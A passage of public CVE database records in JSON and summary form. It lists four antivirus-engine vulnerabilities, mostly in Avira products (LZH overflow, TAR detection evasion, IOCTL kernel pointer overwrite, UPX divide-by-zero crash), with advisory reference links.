               ],
               url: "http://securitytracker.com/id?1018131",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-2974",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an \"integer cast around.\"",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
                     refsource: "MISC",
                     url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
                  },
                  {
                     name: "24187",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24187",
                  },
                  {
                     name: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                     refsource: "CONFIRM",
                     url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                  },
                  {
                     name: "ADV-2007-1971",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2007/1971",
                  },
                  {
                     name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                     refsource: "FULLDISC",
                     url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
                  },
                  {
                     name: "36712",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36712",
                  },
                  {
                     name: "2764",
                     refsource: "SREASON",
                     url: "http://securityreason.com/securityalert/2764",
                  },
                  {
                     name: "25417",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25417",
                  },
                  {
                     name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
                  },
                  {
                     name: "avira-antivir-lzh-bo(34551)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
                  },
                  {
                     name: "1018131",
                     refsource: "SECTRACK",
                     url: "http://securitytracker.com/id?1018131",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-2974",
      datePublished: "2007-06-01T01:00:00",
      dateReserved: "2007-05-31T00:00:00",
      dateUpdated: "2024-08-07T13:57:54.858Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1459
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 19:01
Severity ?
Summary
The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.htmlvendor-advisory, x_refsource_SUSE
http://osvdb.org/80406vdb-entry, x_refsource_OSVDB
http://osvdb.org/80393vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/archive/1/522005mailing-list, x_refsource_BUGTRAQ
http://osvdb.org/80403vdb-entry, x_refsource_OSVDB
http://osvdb.org/80389vdb-entry, x_refsource_OSVDB
http://osvdb.org/80391vdb-entry, x_refsource_OSVDB
http://osvdb.org/80409vdb-entry, x_refsource_OSVDB
http://osvdb.org/80396vdb-entry, x_refsource_OSVDB
https://exchange.xforce.ibmcloud.com/vulnerabilities/74302vdb-entry, x_refsource_XF
http://osvdb.org/80392vdb-entry, x_refsource_OSVDB
http://www.ieee-security.org/TC/SP2012/program.htmlx_refsource_MISC
http://osvdb.org/80390vdb-entry, x_refsource_OSVDB
http://www.mandriva.com/security/advisories?name=MDVSA-2012:094vendor-advisory, x_refsource_MANDRIVA
http://osvdb.org/80407vdb-entry, x_refsource_OSVDB
http://osvdb.org/80395vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/52623vdb-entry, x_refsource_BID
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T19:01:01.248Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "openSUSE-SU-2012:0833",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_SUSE",
                     "x_transferred",
                  ],
                  url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
               },
               {
                  name: "80406",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80406",
               },
               {
                  name: "80393",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80393",
               },
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "80403",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80403",
               },
               {
                  name: "80389",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80389",
               },
               {
                  name: "80391",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80391",
               },
               {
                  name: "80409",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80409",
               },
               {
                  name: "80396",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80396",
               },
               {
                  name: "multiple-av-tar-header-evasion(74302)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
               },
               {
                  name: "80392",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80392",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "80390",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80390",
               },
               {
                  name: "MDVSA-2012:094",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_MANDRIVA",
                     "x_transferred",
                  ],
                  url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
               },
               {
                  name: "80407",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80407",
               },
               {
                  name: "80395",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80395",
               },
               {
                  name: "52623",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/52623",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-01-17T19:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "openSUSE-SU-2012:0833",
               tags: [
                  "vendor-advisory",
                  "x_refsource_SUSE",
               ],
               url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
            },
            {
               name: "80406",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80406",
            },
            {
               name: "80393",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80393",
            },
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "80403",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80403",
            },
            {
               name: "80389",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80389",
            },
            {
               name: "80391",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80391",
            },
            {
               name: "80409",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80409",
            },
            {
               name: "80396",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80396",
            },
            {
               name: "multiple-av-tar-header-evasion(74302)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
            },
            {
               name: "80392",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80392",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "80390",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80390",
            },
            {
               name: "MDVSA-2012:094",
               tags: [
                  "vendor-advisory",
                  "x_refsource_MANDRIVA",
               ],
               url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
            },
            {
               name: "80407",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80407",
            },
            {
               name: "80395",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80395",
            },
            {
               name: "52623",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/52623",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1459",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "openSUSE-SU-2012:0833",
                     refsource: "SUSE",
                     url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
                  },
                  {
                     name: "80406",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80406",
                  },
                  {
                     name: "80393",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80393",
                  },
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "80403",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80403",
                  },
                  {
                     name: "80389",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80389",
                  },
                  {
                     name: "80391",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80391",
                  },
                  {
                     name: "80409",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80409",
                  },
                  {
                     name: "80396",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80396",
                  },
                  {
                     name: "multiple-av-tar-header-evasion(74302)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
                  },
                  {
                     name: "80392",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80392",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "80390",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80390",
                  },
                  {
                     name: "MDVSA-2012:094",
                     refsource: "MANDRIVA",
                     url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
                  },
                  {
                     name: "80407",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80407",
                  },
                  {
                     name: "80395",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80395",
                  },
                  {
                     name: "52623",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/52623",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1459",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T19:01:01.248Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2008-6962
Vulnerability from cvelistv5
Published
2009-08-13 16:00
Modified
2024-08-07 11:49
Severity ?
Summary
Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T11:49:02.509Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "avira-ioctl-privilege-escalation(46567)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
               },
               {
                  name: "ADV-2008-3130",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2008/3130",
               },
               {
                  name: "32269",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/32269",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2008-11-12T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-08-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "avira-ioctl-privilege-escalation(46567)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
            },
            {
               name: "ADV-2008-3130",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2008/3130",
            },
            {
               name: "32269",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/32269",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2008-6962",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "avira-ioctl-privilege-escalation(46567)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
                  },
                  {
                     name: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
                     refsource: "MISC",
                     url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
                  },
                  {
                     name: "ADV-2008-3130",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2008/3130",
                  },
                  {
                     name: "32269",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/32269",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2008-6962",
      datePublished: "2009-08-13T16:00:00",
      dateReserved: "2009-08-13T00:00:00",
      dateUpdated: "2024-08-07T11:49:02.509Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2007-2972
Vulnerability from cvelistv5
Published
2007-06-01 01:00
Modified
2024-08-07 13:57
Severity ?
Summary
The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:57:54.603Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "avira-antivir-upx-dos(34556)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
               },
               {
                  name: "24187",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24187",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
               },
               {
                  name: "ADV-2007-1971",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2007/1971",
               },
               {
                  name: "36710",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36710",
               },
               {
                  name: "25417",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25417",
               },
               {
                  name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
               },
               {
                  name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
               },
               {
                  name: "1018132",
                  tags: [
                     "vdb-entry",
                     "x_refsource_SECTRACK",
                     "x_transferred",
                  ],
                  url: "http://www.securitytracker.com/id?1018132",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-05-23T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "avira-antivir-upx-dos(34556)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
            },
            {
               name: "24187",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24187",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
            },
            {
               name: "ADV-2007-1971",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2007/1971",
            },
            {
               name: "36710",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36710",
            },
            {
               name: "25417",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25417",
            },
            {
               name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
            },
            {
               name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
            },
            {
               name: "1018132",
               tags: [
                  "vdb-entry",
                  "x_refsource_SECTRACK",
               ],
               url: "http://www.securitytracker.com/id?1018132",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-2972",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
